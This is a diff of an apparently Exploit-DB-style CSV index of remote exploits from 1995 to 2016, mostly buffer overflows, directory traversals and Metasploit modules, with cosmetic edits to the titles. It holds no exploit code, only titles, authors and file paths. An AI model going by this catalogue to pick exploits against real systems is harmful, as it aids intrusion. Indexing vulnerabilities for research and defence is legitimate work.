id,file,description,date,author,platform,type,port 11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll OpenFile()' Remote Overflow",2010-03-15,mr_me,windows,remote,0 11765,platforms/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,windows,remote,21 11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,multiple,remote,0 -11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflows (1)",2010-03-20,corelanc0d3r,windows,remote,0 +11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (1)",2010-03-20,corelanc0d3r,windows,remote,0 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 11856,platforms/multiple/remote/11856.txt,"uhttp Server 0.1.0-alpha - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 11857,platforms/windows/remote/11857.c,"MX Simulator Server - Remote Buffer Overflow (PoC)",2010-03-23,"Salvatore Fresta",windows,remote,0 -11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflows (2)",2010-03-25,sud0,windows,remote,21 +11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (2)",2010-03-25,sud0,windows,remote,21 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 11886,platforms/windows/remote/11886.py,"SAP MaxDB - Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server - Directory Traversal",2010-03-30,zombiefx,windows,remote,0 11974,platforms/windows/remote/11974.py,"HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution",2010-03-31,"Pierre Nogues",linux,remote,0 12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting",2010-04-03,cp77fk4r,multiple,remote,0 -12044,platforms/windows/remote/12044.c,"EasyFTP Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow",2010-04-04,x90c,windows,remote,0 +12044,platforms/windows/remote/12044.c,"EasyFTP Server 1.7.0.2 - 'MKD' Authenticated Remote Buffer Overflow",2010-04-04,x90c,windows,remote,0 12114,platforms/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote,0 12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit - Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 12119,platforms/windows/remote/12119.pl,"Microsoft Windows FTP Server 1.4 - Authentication Bypass",2010-04-09,chap0,windows,remote,0 @@ -10802,13 +10804,13 @@ id,file,description,date,author,platform,type,port 12312,platforms/windows/remote/12312.rb,"EasyFTP Server 1.7.0.2 - CWD Buffer Overflow (Metasploit)",2010-04-20,"Paul Makowski",windows,remote,0 12320,platforms/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,windows,remote,0 12331,platforms/windows/remote/12331.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (2)",2010-04-20,Dr_IDE,windows,remote,0 -12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 - PWD Remote Exploit",2010-04-22,zombiefx,windows,remote,0 +12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 - 'PWD' Remote Exploit",2010-04-22,zombiefx,windows,remote,0 12343,platforms/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",multiple,remote,0 12367,platforms/windows/remote/12367.html,"HP Digital Imaging - 'hpodio08.dll' Insecure Method Exploit",2010-04-24,"ThE g0bL!N",windows,remote,0 12380,platforms/windows/remote/12380.pl,"Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote,0 12417,platforms/windows/remote/12417.py,"Bigant Messenger 2.52 - 'AntCore.dll RegisterCom()' Remote Heap Overflow",2010-04-27,mr_me,windows,remote,0 12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0 -12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 +12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Authenticated Remote Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 12498,platforms/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote,0 12511,platforms/windows/remote/12511.txt,"MDaemon Mailer Daemon 11.0.1 - Remote File Disclosure",2010-05-05,kingcope,windows,remote,0 12512,platforms/windows/remote/12512.py,"Ziepod+ 1.0 - CrossApplication Scripting",2010-05-05,sinn3r,windows,remote,0 @@ -10861,15 +10863,15 @@ id,file,description,date,author,platform,type,port 14386,platforms/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14387,platforms/multiple/remote/14387.html,"Apple Safari 4.0.2 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14388,platforms/multiple/remote/14388.html,"Netscape Browser 9.0.0.6 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 -14399,platforms/windows/remote/14399.py,"EasyFTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 -14400,platforms/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 -14402,platforms/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 +14399,platforms/windows/remote/14399.py,"EasyFTP Server 1.7.0.11 - 'MKD' Authenticated Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 +14400,platforms/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 +14402,platforms/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - 'CWD' Authenticated Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Hash Disclosure",2010-07-18,kingcope,aix,remote,0 14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow (Metasploit)",2010-07-19,Madjix,windows,remote,0 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",windows,remote,0 14447,platforms/windows/remote/14447.html,"Multiple Browsers (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote,0 -14451,platforms/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 +14451,platforms/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd - Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal",2010-07-28,mywisdom,unix,remote,0 @@ -11364,7 +11366,7 @@ id,file,description,date,author,platform,type,port 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0 16712,platforms/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21 -16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0 +16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0 16714,platforms/win_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,win_x86,remote,2100 16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21 16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0 @@ -11461,7 +11463,7 @@ id,file,description,date,author,platform,type,port 16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,8080 16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x - 'rembo.exe' Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,443 16811,platforms/windows/remote/16811.rb,"TrackerCam - PHP Argument Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8090 -16812,platforms/windows/remote/16812.rb,"Alt-N MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,3000 +16812,platforms/windows/remote/16812.rb,"Alt-N MDaemon 6.8.5 - WorldClient 'form2raw.cgi' Stack Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,3000 16813,platforms/windows/remote/16813.rb,"Novell NetMail 3.52d - NMAP STOR Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,689 16814,platforms/windows/remote/16814.rb,"Novell Groupwise Messenger Client - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,8300 16815,platforms/windows/remote/16815.rb,"Novell ZENworks 6.5 - Desktop/Server Management Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 @@ -11503,7 +11505,7 @@ id,file,description,date,author,platform,type,port 16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0 16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0 16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0 -16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0 +16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point - 'apply.cgi' Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0 16860,platforms/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,lin_x86,remote,0 @@ -11560,7 +11562,7 @@ id,file,description,date,author,platform,type,port 17029,platforms/windows/remote/17029.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe OvJavaLocale' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17030,platforms/windows/remote/17030.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe execvp' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17031,platforms/linux/remote/17031.rb,"Distributed Ruby - send syscall (Metasploit)",2011-03-23,Metasploit,linux,remote,0 -17034,platforms/windows/remote/17034.py,"Progea Movicon 11 - TCPUploadServer Remote Exploit",2011-03-23,"Jeremy Brown",windows,remote,0 +17034,platforms/windows/remote/17034.py,"Progea Movicon 11 - 'TCPUploadServer' Remote Exploit",2011-03-23,"Jeremy Brown",windows,remote,0 17038,platforms/windows/remote/17038.rb,"HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe schdParams' Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager (OV NNM) - 'snmpviewer.exe' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe ICount' CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 @@ -11637,10 +11639,10 @@ id,file,description,date,author,platform,type,port 17498,platforms/windows/remote/17498.rb,"Freefloat FTP Server - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,remote,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - Overflow (SEH) (Metasploit)",2016-04-05,Metasploit,windows,remote,80 -39662,platforms/windows/remote/39662.rb,"PCMan FTP Server Buffer Overflow - 'PUT' Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21 +39662,platforms/windows/remote/39662.rb,"PCMan FTP Server - 'PUT_ Buffer Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,21 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow (Metasploit)",2011-07-09,Metasploit,windows,remote,0 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - Man In The Middle Exploit",2011-07-09,Nibin,windows,remote,0 -17519,platforms/windows/remote/17519.py,"Freefloat FTP Server - 'LIST' Command Buffer Overflow",2011-07-10,"Zer0 Thunder",windows,remote,0 +17519,platforms/windows/remote/17519.py,"Freefloat FTP Server - 'LIST' Buffer Overflow",2011-07-10,"Zer0 Thunder",windows,remote,0 17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (Metasploit) (1)",2011-07-10,Metasploit,windows,remote,0 17527,platforms/windows/remote/17527.py,"Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0 17535,platforms/multiple/remote/17535.rb,"Java RMI - Server Insecure Default Configuration Java Code Execution (Metasploit)",2011-07-15,Metasploit,multiple,remote,0 @@ -11684,7 +11686,7 @@ id,file,description,date,author,platform,type,port 17848,platforms/windows/remote/17848.rb,"Measuresoft ScadaPro 4.0.0 - Remote Command Execution (Metasploit)",2011-09-16,Metasploit,windows,remote,0 17849,platforms/windows/remote/17849.rb,"RealNetworks Realplayer - QCP Parsing Heap Overflow (Metasploit)",2011-09-17,Metasploit,windows,remote,0 17855,platforms/windows/remote/17855.rb,"DaqFactory - HMI NETB Request Overflow (Metasploit)",2011-09-18,Metasploit,windows,remote,0 -17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow",2011-09-19,mr.pr0n,windows,remote,0 +17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' Remote Buffer Overflow",2011-09-19,mr.pr0n,windows,remote,0 17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0 17883,platforms/hardware/remote/17883.txt,"Blue Coat Reporter - Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote,0 17884,platforms/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow",2011-09-22,mr_me,windows,remote,0 @@ -11915,7 +11917,7 @@ id,file,description,date,author,platform,type,port 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd - Exploit",1998-08-05,"Chuck Athey and Jim Garlick",linux,remote,0 19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 cgi-bin wrap - Exploit",1997-04-19,"J.A. Gutierrez",multiple,remote,0 -19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin webdist.cgi Exploit",1997-05-06,anonymous,multiple,remote,0 +19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Exploit",1997-05-06,anonymous,multiple,remote,0 19303,platforms/multiple/remote/19303.txt,"SGI IRIX 6.4 - cgi-bin handler Exploit",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 19316,platforms/irix/remote/19316.c,"SGI IRIX 6.5.2 nsd - Exploit",1999-05-31,"Jefferson Ogata",irix,remote,0 19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0 @@ -12005,7 +12007,7 @@ id,file,description,date,author,platform,type,port 19614,platforms/windows/remote/19614.asm,"Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 - POP Buffer Overflow",1999-11-11,"Ussr Labs",windows,remote,0 19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5 Media Player - ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0 -19620,platforms/unix/remote/19620.txt,"Matt Wright - FormHandler.cgi 2.0 Reply Attachment",1999-11-16,m4rcyS,unix,remote,0 +19620,platforms/unix/remote/19620.txt,"Matt Wright - 'FormHandler.cgi' 2.0 Reply Attachment",1999-11-16,m4rcyS,unix,remote,0 19621,platforms/windows/remote/19621.c,"Admiral Systems EmailClub 1.0.0.5 - Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19622,platforms/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 - 'Cgitest.exe' Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 - login & Password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 @@ -12036,7 +12038,7 @@ id,file,description,date,author,platform,type,port 19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow",1999-12-31,"Brock Tellier",unixware,remote,0 19708,platforms/php/remote/19708.php,"PHP 3.0.13 - 'Safe_mode' Failure",2000-01-04,"Kristian Koehntopp",php,remote,0 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Exploit",2000-01-04,anonymous,multiple,remote,0 -19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0 +19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - 'search.cgi' Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0 40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,ruby,remote,80 19717,platforms/java/remote/19717.rb,"Java Applet - Field Bytecode Verifier Cache Remote Code Execution (Metasploit)",2012-07-11,Metasploit,java,remote,0 19718,platforms/windows/remote/19718.rb,"AdminStudio - 'LaunchHelp.dll' ActiveX Arbitrary Code Execution (Metasploit)",2012-07-11,Metasploit,windows,remote,0 @@ -12083,7 +12085,7 @@ id,file,description,date,author,platform,type,port 19832,platforms/hardware/remote/19832.rb,"Siemens Simatic S7-300 - PLC Remote Memory Viewer (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,8080 19833,platforms/hardware/remote/19833.rb,"Siemens Simatic S7-1200 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,0 19842,platforms/cgi/remote/19842.txt,"TalentSoft Web+ 4.x - Directory Traversal",2000-04-12,"John P. McNeely",cgi,remote,0 -19844,platforms/cgi/remote/19844.txt,"CNC Technology BizDB 1.0 - bizdb-search.cgi Remote Command Execution",2000-04-13,"PErfecto Technology",cgi,remote,0 +19844,platforms/cgi/remote/19844.txt,"CNC Technology BizDB 1.0 - 'bizdb-search.cgi' Remote Command Execution",2000-04-13,"PErfecto Technology",cgi,remote,0 19845,platforms/windows/remote/19845.pl,"Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Filename Obfuscation",2000-04-14,"rain forest puppy",windows,remote,0 19846,platforms/windows/remote/19846.pl,"Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Buffer Overflow",2000-04-14,"Richie & Beto",windows,remote,0 19847,platforms/unix/remote/19847.c,"UoW IMAPd Server 10.234/12.264 - Buffer Overflow",2002-08-01,"Gabriel A. Maggiotti",unix,remote,0 @@ -12146,7 +12148,7 @@ id,file,description,date,author,platform,type,port 19995,platforms/cgi/remote/19995.txt,"Michael Lamont Savant Web Server 2.1 - CGI Source Code Disclosure",2000-06-05,Drew,cgi,remote,0 19997,platforms/windows/remote/19997.java,"Etype Eserv 2.9.2 - Logging Buffer Overflow",2000-05-10,Wizdumb,windows,remote,0 19998,platforms/linux/remote/19998.c,"ISC innd 2.x - Remote Buffer Overflow",2000-06-12,"Michal Zalewski",linux,remote,0 -20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 - userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 +20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 - 'userreg.cgi' Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0 20009,platforms/linux/remote/20009.py,"AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,linux,remote,0 20019,platforms/windows/remote/20019.txt,"Cart32 3.0 - 'expdate' Administrative Information Disclosure",2000-05-03,cassius,windows,remote,0 @@ -12302,7 +12304,7 @@ id,file,description,date,author,platform,type,port 20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0 20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0 -20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote 'Username' and Password Retrieval",2000-10-26,@stake,hardware,remote,0 +20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote,0 20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0 20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0 20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 - Executable File Parsing",2000-11-06,Nsfocus,windows,remote,0 @@ -12331,7 +12333,7 @@ id,file,description,date,author,platform,type,port 20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,cgi,remote,0 20441,platforms/multiple/remote/20441.txt,"IBM Net.Data 7.0 - Full Path Disclosure",2000-11-29,"Chad Kalmes",multiple,remote,0 20442,platforms/cgi/remote/20442.html,"Greg Matthews - 'Classifieds.cgi' 1.0 Hidden Variable",1998-12-15,anonymous,cgi,remote,0 -20444,platforms/cgi/remote/20444.txt,"Greg Matthews - Classifieds.cgi 1.0 MetaCharacter",1998-12-15,anonymous,cgi,remote,0 +20444,platforms/cgi/remote/20444.txt,"Greg Matthews - 'Classifieds.cgi' 1.0 MetaCharacter",1998-12-15,anonymous,cgi,remote,0 20445,platforms/windows/remote/20445.txt,"Microsoft IIS 1.0 / Netscape Server 1.0/1.12 / OReilly WebSite Professional 1.1b - '.cmd' / '.CMD' Remote Command Execution",1996-03-01,anonymous,windows,remote,0 20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 - 'wguest.exe' Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 - 'rguest.exe' Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 @@ -12343,7 +12345,7 @@ id,file,description,date,author,platform,type,port 20461,platforms/windows/remote/20461.txt,"Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0 20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0 20463,platforms/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution",1997-07-10,"Razvan Dragomirescu",cgi,remote,0 -20465,platforms/cgi/remote/20465.sh,"Squid Web Proxy 2.2 - cachemgr.cgi Unauthorized Connection",1999-07-23,fsaa,cgi,remote,0 +20465,platforms/cgi/remote/20465.sh,"Squid Web Proxy 2.2 - 'cachemgr.cgi' Unauthorized Connection",1999-07-23,fsaa,cgi,remote,0 20466,platforms/multiple/remote/20466.txt,"Apache 1.3 + PHP 3 - File Disclosure",2000-12-06,"china nsl",multiple,remote,0 20467,platforms/multiple/remote/20467.txt,"Inktomi Search Software 3.0 - Source Disclosure",2000-12-05,"china nsl",multiple,remote,0 20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",multiple,remote,0 @@ -12364,7 +12366,7 @@ id,file,description,date,author,platform,type,port 20501,platforms/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution 6.0 - SQL Injection (Metasploit)",2012-08-15,Metasploit,windows,remote,7879 20502,platforms/java/remote/20502.rb,"Novell ZENworks Asset Management - Remote Execution (Metasploit)",2012-08-15,Metasploit,java,remote,8080 20503,platforms/cgi/remote/20503.html,"Leif M. Wright simplestmail.cgi 1.0 - Remote Command Execution",2000-12-11,rpc,cgi,remote,0 -20504,platforms/cgi/remote/20504.html,"Leif M. Wright - ad.cgi 1.0 Unchecked Input",2000-12-11,rpc,cgi,remote,0 +20504,platforms/cgi/remote/20504.html,"Leif M. Wright - 'ad.cgi' 1.0 Unchecked Input",2000-12-11,rpc,cgi,remote,0 20506,platforms/cgi/remote/20506.html,"Leif M. Wright simplestguest.cgi 2.0 - Remote Command Execution",2000-12-14,suid,cgi,remote,0 20507,platforms/multiple/remote/20507.txt,"alex heiphetz Group eZshopper 2.0/3.0 - Directory Traversal",2000-12-13,Nsfocus,multiple,remote,0 20510,platforms/windows/remote/20510.txt,"AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Buffer Overflow",2000-12-12,"Joe Testa",windows,remote,0 @@ -12404,7 +12406,7 @@ id,file,description,date,author,platform,type,port 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 - JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",jsp,remote,0 20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0 20594,platforms/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote,0 -20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,multiple,remote,0 +20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache HTTPd 0.8.11/0.8.14 - ScriptAlias Source 